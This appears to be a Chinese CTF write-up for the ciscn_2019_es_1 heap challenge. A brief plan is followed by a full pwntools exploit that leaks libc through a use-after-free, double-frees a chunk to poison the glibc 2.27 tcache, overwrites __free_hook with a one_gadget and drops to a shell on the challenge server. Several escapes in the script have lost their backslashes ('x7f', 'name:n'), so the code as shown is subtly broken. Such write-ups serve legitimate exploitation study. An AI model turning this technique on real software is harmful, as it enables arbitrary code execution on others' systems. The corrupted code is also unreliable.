ciscn

ciscn ciscn_2019_es_1

查看保护


有一个uaf在call函数里，2.27下可以double free的libc，思路很明确，直接申请大堆泄露出libc_base，再double free劫持tcache链表，写入free_hook进tcache。改hook为one_gadget即可。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25115)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'choice:'

def add(size, name, call):
    r.sendlineafter(menu, '1')
    r.sendlineafter("Please input the size of compary's name", str(size))
    r.sendlineafter("please input name:", name)
    r.sendafter("please input compary call:", call)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Please input the index:', str(index))

def show(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter("Please input the index:", str(index))

add(0x420, 'aaaa', 'b' * 0xc)   #0
add(0x10, 'bbbb', 'b' * 0xc)    #1
add(0x10, 'cccc', 'c' * 0xc)    #2

delete(0)

show(0)

malloc_hook = u64(r.recvuntil('x7f')[-6:].ljust(8, b'x00')) - 96 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

libc = ELF('./2.27/libc-2.27.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = one[1] + libc_base

delete(1)
delete(1)

show(1)

r.recvuntil("name:n")
chunk_addr = u64(r.recv(6).ljust(8, b'x00'))
success('chunk_addr = ' + hex(chunk_addr))

tcache_addr = chunk_addr - 0x680
success('tcache_addr = ' + hex(tcache_addr))

add(0x10, p64(free_hook), p64(tcache_addr))
add(0x10, p64(one_gadget), p64(one_gadget))

delete(2)

r.interactive()